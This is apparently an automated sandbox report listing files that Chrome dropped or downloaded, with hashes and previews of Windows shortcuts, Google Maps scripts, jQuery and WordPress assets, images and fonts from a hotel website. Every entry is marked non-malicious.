              SHA1:23F8B8BD9472A438DBFB252E9101C4C78DAC15C0
              SHA-256:5FF5466F25606D11A664EF3621E3CF00840E3A80214BC26022CA24E2C14A83BA
              SHA-512:5099DB167FB378C10A2D4377CEE94102FEB147CEF2548C9FD773CA605312B717D39F99A14081EDAC7CF308A5DB891FC9842FFF14811D58E6B5F7BDB56AB7EB7B
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,....%. =.&......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IYY.D....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYY.D....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VYY.D....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VYY.D...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VYY.D...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............/.4.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 07:38:17 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2679
              Entropy (8bit):4.006211855325048
              Encrypted:false
              SSDEEP:
              MD5:10F9494AF228EAE2C5C7C5EA897691D7
              SHA1:C0CD50AECC58DE2B89845184530490D54A794400
              SHA-256:C12F29C8B91BC20522CED4ABE6628201636EC03117F43A1D6EF7D49ECB0804AE
              SHA-512:37B831B3A07E8E318971F568CEBED250567D1DBC38EE0A02B473255A62BF5943D0B05E2F25484DD55ABB1B4EA6168AEDD6ECB396F488A2787228F8423F856C48
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,.......=.&......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IYY.D....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYY.D....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VYY.D....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VYY.D...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VYY.D...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............/.4.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2693
              Entropy (8bit):4.015695613184684
              Encrypted:false
              SSDEEP:
              MD5:97DB15A28244C4CD05D23A02EA118AF4
              SHA1:0359E6CC4DC7850FA17AEEDA02CA97484B0BCAEC
              SHA-256:768AA83F7A292E4C2B6363598510ADDDD61795C03945DA1CACFBFF74BA4885BB
              SHA-512:6FFDAEFF4FF0835B38A04E3704B999FBBE2529769BD3EABBCC6E252E2EF3AB77778F48548E048E9C5C0C0276D40344DBD8A7B0A26611B6CFC82039D58D1BA807
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IYY.D....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYY.D....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VYY.D....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VYY.D...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............/.4.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 07:38:17 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2681
              Entropy (8bit):4.005276560611312
              Encrypted:false
              SSDEEP:
              MD5:5A70E54954D52FA618C0DEF2760C8DE0
              SHA1:0C9469196EB2C6B0599DA7367EB64BCC915D2910
              SHA-256:349EEFD2CA4B186B1E8FE202DE3BAB4E7612C5548A7399457B7EFB1920A11411
              SHA-512:3F02F2B3EDF9742774FC0CC7D32A6CE93ED83FE2499F0832067D71AF24B2EE68EE2ECB5874CFA00C952582FB4728DB2BB45757253C67E2951CA2425318847E2D
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,.....!.=.&......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IYY.D....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYY.D....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VYY.D....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VYY.D...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VYY.D...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............/.4.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 07:38:17 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2681
              Entropy (8bit):3.995379617513511
              Encrypted:false
              SSDEEP:
              MD5:15835774BFAE850BD7D4140F363C49FA
              SHA1:3E98EC61D0674100FB2770C49DEB4ACC944CC95B
              SHA-256:B906C30939E0C2E5BC83FB8BC45A9D83781E720AA455B5D939CEDC85931E00BE
              SHA-512:D2164F4B536650EA0C65CD053893AD44EA78D853D185BBC03B655B1603D122865BA6A47B3417D7D4D72632B997BE23CA831253A9155F98076D118D4915899992
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,.......=.&......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IYY.D....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYY.D....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VYY.D....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VYY.D...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VYY.D...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............/.4.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 25 07:38:17 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
              Category:dropped
              Size (bytes):2683
              Entropy (8bit):4.002777934478338
              Encrypted:false
              SSDEEP:
              MD5:13650FFBFFFC510EA0C88CDBCEC1638D
              SHA1:34A3047ED3CF1ED29380BD42E4E589BC7E47E498
              SHA-256:2D3BBE491D0BB0D13CF8B7253D4717E72AFB5780E4789D5C3AC5EC13A9E6D390
              SHA-512:D281FD006475E3A176F9FEFE3BBD8C07EEFE881704231D12B05FF420312425DE2A684AC4A90B487C5D251101E4B2BFF2B71481881532AA7A90320AC08F69C42B
              Malicious:false
              Reputation:unknown
              Preview:L..................F.@.. ...$+.,.......=.&......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IYY.D....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYY.D....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VYY.D....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VYY.D...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VYY.D...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............/.4.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (1246)
              Category:downloaded
              Size (bytes):3490
              Entropy (8bit):5.386610568583491
              Encrypted:false
              SSDEEP:
              MD5:4B83585875155DE2744A0BDE48A1EC55
              SHA1:B4BC7E447E54C2723B005C81C278272467C8C5A8
              SHA-256:6B50DE80A0642B89C80FE156842A7C2198570105587FD42D5D894BA8B106EBBE
              SHA-512:898A12C9725030411F8083CC248D21E49A5E2264366041C1A0AD6AE74E340A7A39847C18083F7BF9A18220CD72BEC360165A31DD72744EA64FB6E4165404921F
              Malicious:false
              Reputation:unknown
              URL:https://maps.googleapis.com/maps-api-v3/api/js/58/10/overlay.js
              Preview:google.maps.__gjsload__('overlay', function(_){var Mwa=function(){},MB=function(a){a.aB=a.aB||new Mwa;return a.aB},Nwa=function(a){this.Eg=new _.Um(()=>{const b=a.aB;if(a.getPanes()){if(a.getProjection()){if(!b.Hg&&a.onAdd)a.onAdd();b.Hg=!0;a.draw()}}else{if(b.Hg)if(a.onRemove)a.onRemove();else a.remove();b.Hg=!1}},0)},Pwa=function(a,b){const c=MB(a);let d=c.Fg;d||(d=c.Fg=new Nwa(a));_.Hb(c.Eg||[],_.Ck);var e=c.Ig=c.Ig||new _.Wpa;const f=b.__gm;e.bindTo("zoom",f);e.bindTo("offset",f);e.bindTo("center",f,"projectionCenterQ");e.bindTo("projection",.b);e.bindTo("projectionTopLeft",f);e=c.Kg=c.Kg||new Owa(e);e.bindTo("zoom",f);e.bindTo("offset",f);e.bindTo("projection",b);e.bindTo("projectionTopLeft",f);a.bindTo("projection",e,"outProjection");a.bindTo("panes",f);e=()=>_.Vm(d.Eg);c.Eg=[_.Ak(a,"panes_changed",e),_.Ak(f,"zoom_changed",e),_.Ak(f,"offset_changed",e),_.Ak(b,"projection_changed",e),_.Ak(f,"projectioncenterq_changed",e)];_.Vm(d.Eg);b instanceof _.il?(_.xl(b,"Ox"),_.L(b,148440)):b
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (906)
              Category:dropped
              Size (bytes):2675
              Entropy (8bit):5.284019091810447
              Encrypted:false
              SSDEEP:
              MD5:807F781DDF08E5CEA237DB849F1D2E4F
              SHA1:6ACA99D0C91B890B6146776B90BE6AD856FFC520
              SHA-256:E4EFF33968D7B2EAC7C4EA4318287289F90E1855F4CB2E312709D318EFAA1727
              SHA-512:43F2601FB8C9B565E4501AFE7DE7DC5B3B062E280ACDA670231AC57EC0DD1EC7A47CFC199900467FE42847156CDCAB1AECDBF49B26DD119362600BD7ADE634B3
              Malicious:false
              Reputation:unknown
              Preview:google.maps.__gjsload__('search', function(_){var nta=function(){},fB=function(a){this.setValues(a);_.rj("search_impl")},pta=function(a){let b=_.Rl,c=-1;a.tiles.forEach(e=>{e.zoom>c&&(b=e.fi,c=e.zoom)});if(c===-1)return[];const d=[];a.Wu().forEach(e=>{e.a&&e.a.length>=2&&d.push(new ota(e,b,c))});return d},qta=function(a){const b=[];a.data.forEach(c=>{b.push(...pta(c))});return b};_.Ga(nta,_.Pk);var rta={["1"]:{}},ota=class{constructor(a,b,c){this.sn=b;this.zoom=c;this.bounds=this.anchor=null;this.Eg=rta;this.source=a;this.featureId=this.source.id||"0";this.infoWindowOffset=(this.source.io||[]).length===2?new google.maps.Point(this.source.io[0],this.source.io[1]):null}getAnchor(){if(!this.anchor){const a=1<<this.zoom;this.anchor=_.sm(new _.Dm((this.sn.x*256+this.source.a[0])/a,(this.sn.y*256+this.source.a[1])/a)).toJSON()}return this.anchor}getCompleteBounds(){return this.getBounds().reduce((a,.b)=>{a.extendByBounds(b);return a},_.wm(0,0,0,0))}getBounds(){if(this.bounds===null){this.bou
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 82", baseline, precision 8, 2560x1437, components 3
              Category:dropped
              Size (bytes):410237
              Entropy (8bit):7.965623176372979
              Encrypted:false
              SSDEEP:
              MD5:8465560F676E5A0B4E290AFCBD376B8E
              SHA1:3C986E0B5FE1315ECF8C8ECE57ED88FD3CA99F49
              SHA-256:A5787E9F703BD9E5E7FEDD131A9261FCDFEDCAB386345FBAECA4B3A85713A299
              SHA-512:3B5CFD9DE0873C7CC4EF5B70AF522DEB26D96F537CBAFF905FBDADBB4E522F75DFCA9FC5277ED6BC00874BC5B255F814EF5487371110C03A4774A930BAB1D2CD
              Malicious:false
              Reputation:unknown
              Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v90), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......]e..W..7.....Y...Iz:V5...n..O.c...L.j....V..y.Z.u...oE.`.V".....qKP.w......L.#..SF7..KE..R.@.....)qE....)E...Q.Z@..R.(.)h...R...Q.)h.)h..(.)qE..QKE.%--..@9....P.iqK.(.1I.v(.0.E:....\R....1K.1@..N.&(..R.O.&)..QN.!....Q.Z.JC.:.S...u7.(.!.)..@..QM..C.E8SE8R.*n|Km.n........./kf.u.)...8SE8T.8Q..(...p..8
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:RIFF (little-endian) data, Web/P image
              Category:dropped
              Size (bytes):8702
              Entropy (8bit):7.975129425225083
              Encrypted:false
              SSDEEP:
              MD5:9D77BFC0AFE889EF9B67CEA79EFBE2F1
              SHA1:69CD6F02E0E834E2EB9EE2E2D2CAE23571901524
              SHA-256:123986DBE3E4D9048748B4B9A0CAB4C821A4F0CE4D275B21389FDBD24D36F612
              SHA-512:4FB46C63FD62FCAF92749742C9ECBAE45FDDB02C192BDE7EC98E7C4C44FDB83BD1E2144AB35F63B102F46BDDA82706DF8E23302C04DF2A3DF24286AED915D114
              Malicious:false
              Reputation:unknown
              Preview:RIFF.!..WEBPVP8L.!../..?.G.8.m%...eI......`"..w.`.I....s$...D.U.......m+.....M.5L..AL.......#.~ .(1$.%..R@.S.....N.....".X..P..Y.*.G...4....|x5!"/.O3D.....B.e.i.......4............2...b....)..B..,.`:..1X.!w.34......\.s.5....K.]l.X..|..1.%...m.4..*..4.QcI..M.dRveRl..'.+.....~"..Q...R!....c8..x.*...........<.V{6..a....>.~..>....H.z.D...Y.i?..QSB.&K..B}G........K.-+|]......._V...X..,......K.$...C..*........".....R?y"..Kzk.x..d..rJ..T8.E..x_.{<Y..s./t.%.....Z{..d+..........cO.zP.(2.*(.#.\.d[..fEy.l...K.xC...G...P.<I0.y.r`&d.b...p).....t2...............'.&2Lnd..l>*..\m..y.H.J.U1.........K. ...U..Q....AlQP..1....<.k.:.RB.qy....9..\.d<RJt.W...t..D.H.1<nA2..&f..1b..~<......J!(E....\.,..A..f..j'.h..|E.>.V.Oc........c...x..As.].[.R..X..E...u.*...!-..s..=..."i....b...2..._.....A...r.M..Q.*..A....Gs........q.0wN.....rTG^.7.R\....M.Ms......H..(!.I.p..."<2u>m..(.dV..".!9..f.-.p|...E.M.R..E-.......z#.!t3.O....M.......J..5zF.r....hR.....%...F. .........)1.e.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:Unicode text, UTF-8 text
              Category:downloaded
              Size (bytes):154104
              Entropy (8bit):4.6446127808811655
              Encrypted:false
              SSDEEP:
              MD5:6E11711058A9459A94D5A19B26A78135
              SHA1:76792D5913AFE035B6CCBAC585B0B5E70B33AA76
              SHA-256:7B99EEE1DB728472AAA8452017A0D755F488E8D647CC0F62BAF45F8FF65B95BA
              SHA-512:6ECBE997BC6E82FA7976A98E291EC31E043DE23F0F5D06834FCC809CDE8D0C3FFA0E96C734DFC0B0FBC313E405EAC603540913794BB3A9A86AC56DB5D2AB868A
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/themes/hotera/assets/js/jquery.fancybox.js?ver=1726496070
              Preview:// ==================================================.// fancyBox v3.2.10.//.// Licensed GPLv3 for open source use.// or fancyBox Commercial License for commercial use.//.// http://fancyapps.com/fancybox/.// Copyright 2017 fancyApps.//.// ==================================================.;(function (window, document, $, undefined) {. 'use strict';.. // If there's no jQuery, fancyBox can't work. // =========================================.. if ( !$ ) {. return;. }.. // Check if fancyBox is already initialized. // ========================================.. if ( $.fn.fancybox ) {.. if ( 'console' in window ) {. console.log( 'fancyBox already initialized' );. }.. return;. }.. // Private default settings. // ========================.. var defaults = {.. // Enable infinite gallery navigation. loop : false,.. // Space around image, ignored if zoomed-in or viewport width is smaller than 800px.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:data
              Category:dropped
              Size (bytes):9141
              Entropy (8bit):5.2975271144294185
              Encrypted:false
              SSDEEP:
              MD5:A8127C1A87BB4F99EDBEEC7C37311DCD
              SHA1:9997A1745F48BDD233DBE9BD8164DAA53EBA105B
              SHA-256:F313D12EA6124BD28FC4A6B7163D253BB83D5AEAB5EDCE594880C5C3DF475CBC
              SHA-512:AA10DDC5B29905C60A058FAED3F5F195F7577CEAC46489E02461B5135732194DAA3AEF4AA473127BF8C753312E02074CFDAC8D0F8F0CC8AA544C7F8E02BEBD08
              Malicious:false
              Reputation:unknown
              Preview:/*! This file is auto-generated */.(()=>{var t={2058:(t,e,r)=>{var n;!function(){"use strict";var i={not_string:/[^s]/,not_bool:/[^t]/,not_type:/[^T]/,not_primitive:/[^v]/,number:/[diefg]/,numeric_arg:/[bcdiefguxX]/,json:/[j]/,not_json:/[^j]/,text:/^[^\x25]+/,modulo:/^\x25{2}/,placeholder:/^\x25(?:([1-9]\d*)\$|\(([^)]+)\))?(\+)?(0|'[^$])?(-)?(\d+)?(?:\.(\d+))?([b-gijostTuvxX])/,key:/^([a-z_][a-z_\d]*)/i,key_access:/^\.([a-z_][a-z_\d]*)/i,index_access:/^\[(\d+)\]/,sign:/^[+-]/};function a(t){return function(t,e){var r,n,o,s,l,u,p,c,f,d=1,h=t.length,g="";for(n=0;n<h;n++)if("string"==typeof t[n])g+=t[n];else if("object"==typeof t[n]){if((s=t[n]).keys)for(r=e[d],o=0;o<s.keys.length;o++){if(null==r)throw new Error(a('[sprintf] Cannot access property "%s" of undefined value "%s"',s.keys[o],s.keys[o-1]));r=r[s.keys[o]]}else r=s.param_no?e[s.param_no]:e[d++];if(i.not_type.test(s.type)&&i.not_primitive.test(s.type)&&r instanceof Function&&(r=r()),i.numeric_arg.test(s.type)&&"number"!=typeof r&&
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (13479)
              Category:downloaded
              Size (bytes):13577
              Entropy (8bit):5.272065782731947
              Encrypted:false
              SSDEEP:
              MD5:9FFEB32E2D9EFBF8F70CAABDED242267
              SHA1:3AD0C10E501AC2A9BFA18F9CD7E700219B378738
              SHA-256:5274F11E6FB32AE0CF2DFB9F8043272865C397A7C4223B4CFA7D50EA52FBDE89
              SHA-512:8D6BE545508A1C38278B8AD780C3758AE48A25E4E12EEE443375AA56031D9B356F8C90F22D4F251140FA3F65603AF40523165E33CAE2E2D62FC78EC106E3D731
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
              Preview:/*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],a=1;a<=3;a++){if(+o[a]<+n[a])return 1;if(+n[a]<+o[a])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.4.1";var t=Object.create(null);s.migrateDisablePatches=function(){for(var e=0;e<arguments.length;e++)t[arguments[e]]=!0},s.migrateEnablePatches=function(){for(var e=0;e<arguments.length;e++)delete t[arguments[e]]},s.migrateIsPatchEnabled=function(e){return!t[e]},n.console&&n.console.log&&(s&&e("3.0.0")&&!e("5.0.0")||n.console.log("JQMIGRATE: jQuery 3.x-4.x REQUIRED"),s.migrateWarnings
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:TrueType Font data, 11 tables, 1st "OS/2", 14 names, Macintosh, type 1 string, icomoon
              Category:downloaded
              Size (bytes):1180
              Entropy (8bit):4.129424861318459
              Encrypted:false
              SSDEEP:
              MD5:34AAA8C3D5DE388E2EC772CF2DEC63C9
              SHA1:4CDD0BC60FA8973F865ED4E86F67E321C8B949D2
              SHA-256:9D9D60D0E67103C8AF259AFB0602566045F660918BDDD7997A09A045E6426769
              SHA-512:879C205330EB5E3E7426F9C7C6A4D27E549127A396BAC34B7491B0716EDB359CC24EA1FF323533E37E0202D6B279231B80AD20DF9CE9128B41B4242B05735024
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/wp-hotel-booking/assets/fonts/hotel-booking-star.ttf?f5rno8
              Preview:...........0OS/2...........`cmap.V........Tgasp.......p....glyf..6....x....head.~.....P...6hhea...........$hmtx............loca...P........maxp........... name.J..........post.......|... ...U.......................3...................................@.........@...@............... .................................8............. ........... ................................................79..................79..................79...................%.....%..%..........<.<.<<...33.A..3......`...................%.....%..%..7'?.....'..........<.<.<<.....*..pp..*..33.A..3......`...v..$..$..v............_.<........../......./.............................................................................................<.l...............................................................`...........6...........u.......................K...................................g...........=...........|........... ...........R.........4..icomoon.i.c.o.m.o.o.nVersion 1.0.V.e.r.s.i.o.n. .1...0icomoon.i.c.o.m.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (554)
              Category:downloaded
              Size (bytes):194449
              Entropy (8bit):5.631178033848175
              Encrypted:false
              SSDEEP:
              MD5:D24159D6B6EFFD13D0C781CBB950D73C
              SHA1:25204616AD3B9E787ED1C62CACC935AA79E5BF45
              SHA-256:FAF393CFCF0DD3586BC5B4D4DAF75755215C8F8642FD117A184D44328E056A00
              SHA-512:22B5682CAD051B71B12BF006004521BB9A860273B25B2E966FB65369BFCABA826574E7F91F0587E5742862C069755DCE8F66DD90EB14FC7FB29F293188E818FF
              Malicious:false
              Reputation:unknown
              URL:https://maps.googleapis.com/maps-api-v3/api/js/58/10/util.js
              Preview:google.maps.__gjsload__('util', function(_){/*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/.var Xwa,Ywa,$wa,bxa,TB,cxa,dxa,fxa,VB,XB,gxa,YB,ZB,hxa,bC,jxa,fC,hC,iC,jC,kC,lC,nC,kxa,pC,lxa,sC,uC,vC,wC,nxa,oxa,xC,pxa,AC,DC,EC,qxa,HC,txa,IC,KC,LC,vxa,wxa,xxa,zxa,RC,Bxa,SC,Dxa,TC,Fxa,Exa,Gxa,Hxa,Ixa,Jxa,Kxa,Lxa,Mxa,Nxa,Oxa,Pxa,Qxa,Rxa,Sxa,Txa,Uxa,Vxa,Wxa,Xxa,Yxa,XC,aya,ZC,bya,cya,dya,eya,fya,gya,hya,iya,jya,kya,lya,nya,pya,rya,tya,vya,xya,zya,Bya,Dya,Fya,Gya,Hya,Iya,Jya,Kya,Lya,Mya,$C,Nya,Oya,Pya,Qya,Rya,Sya,Uya,bD,cD,Vya,Wya,Xya,Yya,Zya,$ya,aza,bza,cza,dza,eza,dD,fza,eD,gza,hza,iza,jza,kza,lza,.mza,fD,nza,gD,oza,pza,qza,rza,sza,tza,uza,vza,wza,xza,yza,zza,Aza,Bza,Cza,Dza,Eza,Fza,Gza,Iza,Jza,Kza,Mza,iD,Nza,Oza,Pza,Qza,Rza,Sza,Wza,Xza,Zza,bAa,cAa,dAa,tD,eAa,uD,fAa,vD,gAa,hAa,ED,FD,jAa,HD,ID,JD,lAa,mAa,nAa,MD,ND,PD,QD,oAa,RD,TD,pAa,rAa,sAa,yAa,zAa,ZD,DAa,HAa,IAa,JAa,bE,KAa,MAa,NAa,OAa,PAa,eE,RAa,XAa,pE,$Aa,ZAa,qE,aBa,sE,cBa,dBa,eBa,gBa,hBa,QE,jBa,RE,kBa,lBa,mBa,nBa,TE,pBa,oBa,
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text
              Category:downloaded
              Size (bytes):13056
              Entropy (8bit):4.735741011961725
              Encrypted:false
              SSDEEP:
              MD5:58AFC6517182AE5C202F0183735641BF
              SHA1:5B25570DDC3CE22CAD521922FBCF5D398DDF7BF0
              SHA-256:5BF694F07AFC594AD35AFDB18541248CEBE40F3C6C940E8A30BA048ABC7116CE
              SHA-512:46EC4198E8DB4BBB45C058A06CC771724B567386E666F22F6313F1F640592735349202572F2EC9322CA81F887774334D9A1876BD21A51C2F17A38B034BB331A9
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/themes/hotera/assets/css/flaticon.css?ver=1726496070
